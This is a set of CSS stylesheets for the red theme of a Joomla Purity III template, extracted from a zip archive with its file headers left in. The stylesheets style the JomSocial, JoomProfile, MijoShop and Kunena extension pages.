}PKԜ�\X�_��8purity_iii/local/css/themes/red/extras/com_community.cssnu&1i�.com_community #community-wrap label input,
.com_community #community-wrap .form-field input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .row-fluid.hero-area {
  margin: 0;
}
.com_community #community-wrap .cGuest .row-fluid.hero-area {
  margin-left: 0;
  margin-right: 0;
}
.com_community #community-wrap .js_dropDownMaster dt,
.com_community #community-wrap .js_dropDownParent li > a {
  height: 28px;
}
.com_community #community-wrap .joms-select {
  box-shadow: none;
}
.com_community #community-wrap .js-toolbar .navbar-inner {
  min-height: 40px;
}
.com_community #community-wrap .js-toolbar .nav-collapse {
  display: block;
}
.com_community #community-wrap .js-toolbar .nav > li > a {
  height: 38px;
  line-height: 25px;
}
.com_community #community-wrap .js-toolbar .dropdown-menu > li {
  border: 0;
}
.com_community #community-wrap .cStream-Content .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_community #community-wrap .joms-postbox-input .inputbox {
  box-shadow: none;
}
.com_community #community-wrap .joms-postbox-input .input-status {
  box-shadow: none;
  padding: 10px;
  overflow-y: auto;
  min-height: 160px !important;
}
.com_community #community-wrap .joms-postbox-input {
  overflow-y: scroll !important;
}
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--month,
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--year {
  display: inline-block;
}
.com_community #community-wrap .cProfile-Preferences .js_dropDownMaster dt,
.com_community #community-wrap .cProfile-Preferences .js_dropDownParent li > a {
  height: 26px;
  line-height: 20px;
}
.com_community #community-wrap .cProfile-Preferences label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cSearch .label-checkbox input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .advance-search label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cGroups-Create label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .joms-page .joms-form__group select,
.com_community #community-wrap .joms-page .joms-form__group textarea,
.com_community #community-wrap .joms-page .joms-form__group input[type="text"],
.com_community #community-wrap .joms-page .joms-form__group input[type="password"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime-local"],
.com_community #community-wrap .joms-page .joms-form__group input[type="date"],
.com_community #community-wrap .joms-page .joms-form__group input[type="month"],
.com_community #community-wrap .joms-page .joms-form__group input[type="time"],
.com_community #community-wrap .joms-page .joms-form__group input[type="week"],
.com_community #community-wrap .joms-page .joms-form__group input[type="number"],
.com_community #community-wrap .joms-page .joms-form__group input[type="email"],
.com_community #community-wrap .joms-page .joms-form__group input[type="url"],
.com_community #community-wrap .joms-page .joms-form__group input[type="search"],
.com_community #community-wrap .joms-page .joms-form__group input[type="tel"],
.com_community #community-wrap .joms-page .joms-form__group input[type="color"],
.com_community #community-wrap .joms-page .joms-form__group .inputbox {
  display: inline-block;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-button--privacy {
  margin-right: 15px;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-checkbox input {
  margin-top: 8px;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop a {
  font-size: 2.5rem;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop .joms-icon {
  width: 24px;
  height: 24px;
}
.com_community #community-wrap .jomsocial .joms-body a.joms-button--viewed.nolink span {
  margin: 0;
  padding-left: 15px;
}PKԜ�\+e���:purity_iii/local/css/themes/red/extras/com_joomprofile.cssnu&1i�.com_joomprofile #f90pro .f90pro-wrapper .f90pro-avtar img {
  width: 100%;
}
.com_joomprofile #f90pro .f90pro-wrapper #f90pro-detail .f90pro-left h3 {
  font-size: 18px;
  line-height: 1.5;
}PKԜ�\��P=OO7purity_iii/local/css/themes/red/extras/com_mijoshop.cssnu&1i�.com_mijoshop .common-home #content_oc h1,
.com_mijoshop .common-home #content_oc h2 {
  font-size: 24px;
}
.com_mijoshop .box_oc .box-product {
  margin-left: 0;
  padding: 20px;
}
.com_mijoshop .box_oc .box-product > div {
  float: left;
  margin: 0;
  margin-right: 20px;
  width: 100%;
}
.com_mijoshop .box_oc .box-product > div .image {
  display: inline-block;
  border: 1px solid #eeeeee;
  padding: 5px;
  text-align: left;
}
.com_mijoshop .box_oc .box-product > div .image a {
  display: inline-block;
}
.com_mijoshop .box_oc .box-product > div .image img {
  border: 0;
  padding: 0;
}
.com_mijoshop .box_oc .box-product > div .name {
  padding: 10px 0;
  text-align: left;
}
.com_mijoshop .box_oc .box-product > div .price {
  margin: 10px 0;
}
.com_mijoshop .box_oc #tab-related .box-product > div {
  width: auto;
}
.com_mijoshop .box_oc .box-content .content_oc p * {
  margin: 10px 10px 10px 0;
}
.com_mijoshop #header_oc {
  margin: 0 0 20px;
  padding: 0;
}
.com_mijoshop #header_oc #currency {
  top: 0;
}
.com_mijoshop #header_oc #currency a {
  margin-top: 5px;
}
.com_mijoshop #header_oc #cart {
  border-left: 1px solid #eeeeee;
  margin-left: 20px;
  top: 5px;
}
.com_mijoshop #header_oc #cart .heading {
  margin-top: 0;
}
.com_mijoshop #header_oc #search_oc {
  top: 10px;
  width: 120px;
}
.com_mijoshop #header_oc #search_oc input[type="text"] {
  border-radius: 0;
  height: 25px;
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
.com_mijoshop #header_oc .links {
  bottom: 0;
  top: auto;
}
.com_mijoshop #currency .dropdown-menu > li,
.com_mijoshop #top-links .dropdown-menu > li {
  border-color: #eeeeee;
}
.com_mijoshop #currency .dropdown-menu > li a:hover,
.com_mijoshop #top-links .dropdown-menu > li a:hover,
.com_mijoshop #currency .dropdown-menu > li a:focus,
.com_mijoshop #top-links .dropdown-menu > li a:focus {
  color: #ffffff;
}
.com_mijoshop #currency .open a,
.com_mijoshop #top-links .open a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .image img {
  max-width: 100%;
  width: 100%;
}
.com_mijoshop .mijoshop .product-thumb .caption {
  padding: 15px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 {
  margin: 0 0 10px;
  font-size: 15px;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a:hover,
.com_mijoshop .mijoshop .product-thumb .caption h4 a:focus {
  color: #cc0000;
}
.com_mijoshop .mijoshop .product-thumb .caption .price {
  font-weight: 700;
  color: #cc0000;
  margin-top: 10px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption .price .price-tax {
  color: #999999;
  font-weight: 400;
}
.com_mijoshop #content_oc > h2 {
  margin-bottom: 30px;
  font-size: 24px;
}
.com_mijoshop #content_oc > p {
  padding: 10px 20px;
  border: 1px solid #eeeeee;
  margin-bottom: 20px !important;
  margin-top: 10px !important;
}
.com_mijoshop #content_oc .product-filter {
  padding-bottom: 10px;
}
.com_mijoshop #content_oc .product-filter .display {
  padding-top: 15px;
}
.com_mijoshop #content_oc .product-grid .product-thumb .caption {
  min-height: 200px !important;
}
.com_mijoshop #content_oc .product-list .product-thumb .image {
  padding: 0 20px 0 0;
  height: 200px;
}
.com_mijoshop #content_oc .product-list .product-thumb .image > a {
  height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .image img {
  max-width: 100%;
  max-height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .caption {
  overflow: hidden;
  margin: 0;
  padding: 20px 20px 20px 0 !important;
  min-height: 161px !important;
}
.com_mijoshop .product-info .left {
  width: 30% !important;
}
.com_mijoshop .product-info .right {
  min-height: 352px;
  width: 65% !important;
}
.com_mijoshop .product-info .right .description {
  border-top: 0;
  padding: 0 0 10px;
}
.com_mijoshop .product-info .right .cart div input[type="text"],
.com_mijoshop .product-info .right .cart div input[type="button"] {
  display: inline-block;
}
.com_mijoshop .product-info .right .cart div input[type="text"] {
  padding-left: 5px;
  padding-right: 5px;
}
.com_mijoshop .product-info .right .cart div span {
  color: #999999;
}
.com_mijoshop #tab-description,
.com_mijoshop #tab-review {
  padding: 20px;
}
.com_mijoshop .content_oc ul {
  list-style: none;
  margin: 0;
  padding: 0;
}
.com_mijoshop .cart-info .quantity input[type='text'] {
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
  height: 28px;
  padding-top: 0;
  padding-bottom: 0;
}
.com_mijoshop .cart-module #coupon input,
.com_mijoshop .cart-module #voucher input {
  display: inline-block;
}
.com_mijoshop .cart-module #shipping table {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.com_mijoshop .cart-module #shipping table td {
  padding: 10px 20px;
}
.com_mijoshop .box-category ul li {
  padding: 10px 10px 10px 0;
}
.com_mijoshop #colorbox {
  box-sizing: unset !important;
}
.com_mijoshop #column-right .row > div {
  width: 100%;
  float: none;
}
.com_mijoshop .t3-sidebar .mijoshop .container_oc .row > div {
  width: 100%;
  float: none;
}PKԜ�\p�ƺh�h5purity_iii/local/css/themes/red/extras/com_kunena.cssnu&1i�#kunena.layout .btn-group .dropdown-menu {
  background: #ffffff;
  border-color: #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li {
  border-top: 1px solid #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li a {
  color: #444444;
}
#kunena.layout .btn-group .dropdown-menu li a:hover {
  background-color: #eeeeee;
}
#kunena.layout .btn-group .dropdown-menu li:empty {
  display: none;
}
#kunena.layout .navbar {
  background: transparent;
  border: 0;
  border-bottom: 3px solid #cc0000;
  border-radius: 0;
  min-height: 0;
}
#kunena.layout .navbar .nav {
  margin-bottom: 0;
  width: auto;
}
#kunena.layout .navbar .nav > li {
  margin-right: 3px;
  margin-left: 0;
}
#kunena.layout .navbar .nav > li > a {
  background-color: #444444;
  border-radius: 2px 2px 0 0;
  color: #ffffff;
  font-weight: 400;
  line-height: 1.42857143;
  padding: 5px 10px;
  text-transform: none;
}
#kunena.layout .navbar .nav > li > a:hover,
#kunena.layout .navbar .nav > li > a:focus,
#kunena.layout .navbar .nav > li > a:active {
  background-color: #222222;
  box-shadow: none;
}
#kunena.layout .navbar .nav > li.active a {
  background-color: #cc0000;
  box-shadow: none;
}
@media (max-width: 1199px) {
  #kunena.layout .navbar .navbar-nav.pull-left > div {
    padding-top: 10px;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .btn {
    background: #cc0000;
    color: #ffffff;
    text-align: center;
    text-decoration: none;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse {
    background: #ffffff;
    display: none;
    padding: 0;
    position: absolute;
    width: 100%;
    z-index: 10;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse.in {
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav {
    border: 1px solid #eeeeee;
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li {
    background: #ffffff;
    border: 0;
    margin-right: 0;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a {
    background: #ffffff;
    color: #444444;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:hover,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:focus,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:active {
    color: #cc0000;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li.active a {
    color: #cc0000;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li + li {
    border-top: 1px solid #eeeeee;
  }
}
#kunena.layout .navbar .mobile-user {
  border-radius: 0;
  color: #444444;
  margin-right: 0;
  margin-top: 0 !important;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle {
  background-color: transparent;
  border-radius: 0;
  color: #444444;
  padding: 5px 10px;
  line-height: 20px;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle:hover,
#kunena.layout .navbar .mobile-user .dropdown-toggle:focus,
#kunena.layout .navbar .mobile-user .dropdown-toggle:active {
  background-color: transparent;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle img {
  box-shadow: none;
  height: 17px;
  width: 17px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu {
  background: #ffffff;
  border: 1px solid #eeeeee;
  padding: 20px;
  min-width: 270px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .form-group > div + div {
  margin-top: 10px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .input-group input {
  width: 100%;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail {
  border: 1px solid #eeeeee;
  line-height: 50px;
  height: 50px;
  width: 50px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail .glyphicon {
  font-size: 14px;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .fa-big {
  color: #666666;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .list-unstyled li {
  font-size: 11px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .divider {
  background: #eeeeee;
  height: 1px;
  margin: 10px 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link {
  color: #666666;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:hover,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:focus,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:active {
  color: #cc0000;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .kavatar {
  max-width: 60px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form label {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form a.btn {
  border: 0;
  padding: 0;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .fa {
  margin-right: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu a.btn {
  border: 0;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form .btn {
  border: 0;
  margin: 0;
  padding: 0;
}
@media (max-width: 1199px) {
  #kunena.layout .navbar .mobile-user .dropdown-menu a[data-target="#statusTextModal"] {
    pointer-events: none;
  }
}
#kunena.layout .navbar .mobile-user .list-unstyled li + li {
  margin-top: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu {
  left: auto;
  right: 0;
  width: 250px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a {
  color: #444444;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:hover,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:focus,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:active {
  color: #800000;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form {
  padding: 0 10px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div {
  border: 1px solid #eeeeee;
  border-radius: 3px;
  display: inline-block;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div .btn {
  font-size: 12px;
  padding: 0 5px 2px;
  text-transform: none;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu .btn {
  padding-top: 0;
  padding-bottom: 0;
}
#kunena.layout #jumpto {
  margin-bottom: 20px;
}
#kunena.layout .table > thead > tr > th,
#kunena.layout .table > tbody > tr > th,
#kunena.layout .table > tfoot > tr > th,
#kunena.layout .table > thead > tr > td,
#kunena.layout .table > tbody > tr > td,
#kunena.layout .table > tfoot > tr > td {
  padding: 15px;
}
#kunena.layout .well {
  background: transparent;
  border: 1px solid #eeeeee;
  box-shadow: none;
}
#kunena.layout .topictitle {
  color: #222222;
  font-weight: 500;
  font-size: 16px;
}
#kunena.layout .topictitle:hover,
#kunena.layout .topictitle:focus,
#kunena.layout .topictitle:active {
  color: #cc0000;
}
#kunena.layout .started {
  color: #999999;
  font-size: 13px;
  margin-top: 3.33333333px;
}
#kunena.layout .container-fluid .col-md-9 {
  padding-right: 0;
}
#kunena.layout .modal {
  position: fixed;
}
#kunena.layout .table {
  border: 1px solid #eeeeee;
  float: none;
}
#kunena.layout .table .col-md-2 .col-md-3,
#kunena.layout .table .col-md-3 .col-md-3 {
  padding-right: 10px;
}
#kunena.layout .table .kavatar {
  background: #ffffff;
  border: 1px solid #eeeeee;
  display: block;
  padding: 3px;
}
#kunena.layout .table thead {
  background: #444444;
  color: #ffffff;
  font-size: 14px;
}
#kunena.layout .table thead .well {
  color: #444444;
}
#kunena.layout .table thead tr td {
  border: 0;
}
#kunena.layout .table thead tr td + td {
  border-left: 1px solid rgba(255, 255, 255, 0.2);
}
#kunena.layout .table tr td {
  border: 1px solid #eeeeee;
  float: none !important;
}
#kunena.layout .table tr td.col-md-5 {
  position: relative;
  min-height: 1px;
  padding-left: 15px;
  padding-right: 15px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-5 {
    float: left;
    width: 33.33333333%;
  }
}
#kunena.layout .table tr td.col-md-2 + .col-md-2 {
  position: relative;
  min-height: 1px;
  padding-left: 15px;
  padding-right: 15px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-2 + .col-md-2 {
    float: left;
    width: 25%;
  }
}
#kunena.layout .table td.hidden-xs > a {
  color: #999999;
}
#kunena.layout .table td.hidden-xs > a:hover,
#kunena.layout .table td.hidden-xs > a:focus,
#kunena.layout .table td.hidden-xs > a:active {
  color: #800000;
}
#kunena.layout tbody .col-md-2,
#kunena.layout tbody .col-md-3 {
  color: #666666;
  font-size: 13px;
}
#kunena.layout .btn {
  font-size: 12px;
  padding: 6.66666667px 10px;
  margin-top: 0;
  line-height: 1;
}
#kunena.layout .btn .caret {
  border-top-color: #ffffff;
}
#kunena.layout .btn-default {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
}
#kunena.layout .btn-default .caret {
  border-top-color: #666666;
}
#kunena.layout .btn-default:hover,
#kunena.layout .btn-default:focus,
#kunena.layout .btn-default:active {
  background: #f7f7f7;
}
#kunena.layout .btn-group + .btn-group {
  margin-left: 5px;
}
#kunena.layout #btn_report {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
  padding: 4px 10px;
}
#kunena.layout #btn_report .fa {
  color: #ff8800;
}
#kunena.layout #btn_report:hover,
#kunena.layout #btn_report:focus,
#kunena.layout #btn_report:active {
  border-color: #ff8800;
}
#kunena.layout .kfrontend {
  padding-top: 0;
  margin-bottom: 20px;
  padding-bottom: 0;
}
#kunena.layout .kfrontend:before,
#kunena.layout .kfrontend:after {
  content: " ";
  display: table;
}
#kunena.layout .kfrontend:after {
  clear: both;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa {
  background: transparent;
  border: 1px solid #999999;
  color: #999999;
  height: 28px;
  line-height: 22px;
  padding: 0;
  margin: 8px 12px 0 0;
  visibility: visible;
  text-align: center;
  width: 28px;
  opacity: 0.2;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:before {
  font-size: 24px;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover {
  opacity: 0.5;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover:before {
  color: #ffffff;
}
#kunena.layout .kfrontend h1,
#kunena.layout .kfrontend h2.btn-link {
  background-color: #444444;
  font-size: 17px;
  font-weight: 500;
  padding: 10px 20px;
  margin: 0;
}
#kunena.layout .kfrontend h1 a,
#kunena.layout .kfrontend h2.btn-link a {
  color: #ffffff;
}
#kunena.layout .kfrontend h1 a:hover,
#kunena.layout .kfrontend h2.btn-link a:hover,
#kunena.layout .kfrontend h1 a:focus,
#kunena.layout .kfrontend h2.btn-link a:focus,
#kunena.layout .kfrontend h1 a:active,
#kunena.layout .kfrontend h2.btn-link a:active {
  border-bottom: 0;
  text-decoration: none;
}
#kunena.layout .kfrontend h1:hover,
#kunena.layout .kfrontend h2.btn-link:hover {
  text-decoration: none;
}
#kunena.layout .kfrontend .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
#kunena.layout .kfrontend .section {
  margin-bottom: 0;
}
#kunena.layout .kfrontend .section:before,
#kunena.layout .kfrontend .section:after {
  content: " ";
  display: table;
}
#kunena.layout .kfrontend .section:after {
  clear: both;
}
#kunena.layout .kfrontend .section table {
  border: 1px solid #eeeeee;
}
#kunena.layout .kfrontend .section table th,
#kunena.layout .kfrontend .section table td {
  border: 1px solid #eeeeee;
  padding: 10px 20px;
}
#kunena.layout .kfrontend .section table tr {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table tr.category {
  background-color: #ffffff;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 {
  width: 8%;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a {
  display: block;
  color: #999999;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:hover,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:focus,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:active {
  color: #800000;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-8 {
    width: 35%;
  }
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 {
  vertical-align: middle;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 {
  padding: 0;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 div {
  padding: 0;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-4 {
  padding-right: 10px;
  margin-top: 5px;
  width: 40px;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-8 {
    width: auto;
    max-width: 80%;
  }
}
#kunena.layout .kfrontend .section table tr.category:nth-child(2n+1) {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table .well {
  background-color: transparent;
  box-shadow: none;
  border: 0;
  padding: 0;
}
#kunena.layout .kfrontend .section table .header-desc {
  margin-top: 10px;
  margin-bottom: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline {
  border-top: 1px solid #eeeeee;
  padding-top: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline li {
  margin-bottom: 5px;
}
#kunena.layout .kfrontend .section table ul.list-inline li a {
  color: #444444;
}
#kunena.layout .kfrontend .section table ul.list-inline li a i {
  color: #999999;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus,
#kunena.layout .kfrontend .section table ul.list-inline li a:active {
  color: #800000;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover i,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus i,
#kunena.layout .kfrontend .section table ul.list-inline li a:active i {
  color: #800000;
}
#kunena.layout .kfrontend .section table ul.list-inline li i {
  margin-right: 5px;
}
#kunena.layout .kfrontend #kwho .well,
#kunena.layout .kfrontend #kstats .well {
  background-color: #ffffff;
  margin-bottom: 0;
  padding: 20px 0 0;
}
#kunena.layout .kfrontend #kwho .well i,
#kunena.layout .kfrontend #kstats .well i {
  margin-top: 0;
}
#kunena.layout .kfrontend #kwho .well .btn-link,
#kunena.layout .kfrontend #kstats .well .btn-link {
  color: #999999;
  text-align: left;
}
#kunena.layout .kfrontend #kwho .list-unstyled span + span {
  margin-left: 6.66666667px;
}
#kunena.layout .form-search .btn {
  padding: 0 20px;
  top: 0;
  height: 36px;
}
#kunena.layout .form-search .search {
  height: 36px;
}
#kunena.layout .form-search .search input {
  border-color: #cccccc;
  height: 36px;
  top: 0;
  padding: 0 10px;
  left: -11px;
}
#kunena.layout .form-search .search input:focus {
  border-color: #cc0000;
  box-shadow: none;
}
#kunena.layout #search .well {
  padding-top: 0;
}
#kunena.layout #search > .text-center {
  margin-bottom: 30px;
}
#kunena.layout #search #categorylist {
  margin-bottom: 10px;
}
#kunena.layout #search .row {
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 {
  border: 1px solid #eeeeee;
  padding: 10px;
  margin-top: 20px;
}
@media (min-width: 992px) {
  #kunena.layout #search .row > .col-md-6 {
    margin-right: 20px;
    width: 46%;
  }
}
#kunena.layout #search .row > .col-md-6 fieldset {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 select {
  width: 100%;
}
#kunena.layout #search .row > .col-md-6 select + select {
  margin-top: 10px;
}
#kunena.layout #search .row > .col-md-6 legend {
  margin-bottom: 4px;
  font-size: 14px;
  padding: 0 10px;
}
#kunena.layout #postform .column-item fieldset {
  border: 0;
  padding: 0;
}
@media (min-width: 992px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-left: 0;
    margin-right: 0;
  }
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-bottom: 10px;
  }
  #kunena.layout #postform .column-item fieldset .form-group label {
    margin-bottom: 5px;
    width: 100%;
  }
  #kunena.layout #postform .column-item fieldset .form-group #postcatid {
    margin-left: 0;
  }
}
#kunena.layout #postform .column-item fieldset .controls {
  margin-left: 107px;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .controls {
    padding-left: 15px;
    padding-right: 15px;
    margin-left: 0;
  }
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:before,
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  content: " ";
  display: table;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label {
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #999999;
  padding: 0;
  margin: 0 10px 10px 0;
  line-height: 40px;
  text-align: center;
  height: 40px;
  width: 40px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label .fa {
  font-size: 18px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"]:checked + label {
  background: transparent;
  border: 1px solid #cc0000;
  color: #cc0000;
  padding: 0;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor {
  border: 0;
  margin-bottom: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li {
  margin-right: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li a {
  border: 1px solid #eeeeee;
  color: #444444;
  padding: 5px 10px;
  line-height: 1;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li.active a {
  background: #cc0000;
  border: 1px solid #cc0000;
  color: #ffffff;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader {
  background: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px;
  height: auto;
  margin-bottom: -1px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:before,
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  content: " ";
  display: table;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor {
  padding: 10px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor:focus {
  box-shadow: none;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item #kpost-attachments .control-label,
  #kunena.layout #postform .column-item #kpost-subscribe .control-label {
    display: block;
    float: none;
    text-align: left;
  }
  #kunena.layout #postform .column-item #kpost-attachments .controls,
  #kunena.layout #postform .column-item #kpost-subscribe .controls {
    padding-left: 0;
  }
  #kunena.layout #postform .column-item #kpost-attachments .string,
  #kunena.layout #postform .column-item #kpost-subscribe .string {
    display: inline;
  }
}
#kunena.layout #postform > div > div > div > fieldset > div > div {
  margin: 0;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog {
  margin: 110px auto;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog h3 {
  margin-top: 0;
}
#kunena.layout #postform > .center {
  margin-bottom: 20px;
}
#kunena.layout #postform #kattach_form .label-info {
  background: transparent;
  color: #444444;
  display: block;
  font-weight: 400;
  padding: 0;
  text-align: left;
  margin-bottom: 5px;
  white-space: normal;
}
#kunena.layout #postform #kattach_form > br {
  display: none;
}
#kunena.layout #files {
  margin-top: 20px;
}
#kunena.layout #files:before,
#kunena.layout #files:after {
  content: " ";
  display: table;
}
#kunena.layout #files:after {
  clear: both;
}
#kunena.layout #files > div {
  border: 1px dashed #eeeeee;
  display: inline-block;
  padding: 10px;
  margin-right: 5px;
  margin-bottom: 10px;
  float: left;
}
#kunena.layout #files > div .btn {
  display: block;
  padding: 5px;
  font-size: 11px;
  margin-top: 5px;
  width: 100%;
}
#kunena.layout #files > div .alert-error {
  background: transparent;
  border: 0;
  color: #ff8800;
  padding: 0;
  margin-bottom: 0;
  margin-top: 10px;
  max-width: 150px;
}
#kunena.layout #dropzone .dropzone .message {
  border: 2px dashed #eeeeee;
  color: #999999;
  margin: 0;
  padding: 20px;
  text-transform: uppercase;
}
@media (max-width: 991px) {
  .view-announcement #kunena.layout #adminForm {
    overflow-x: scroll;
    margin-bottom: 20px;
  }
}
#kunena.layout #editavatar {
  overflow-x: scroll;
}
#kunena.layout #KunenaUserEdit {
  margin-bottom: 20px;
}
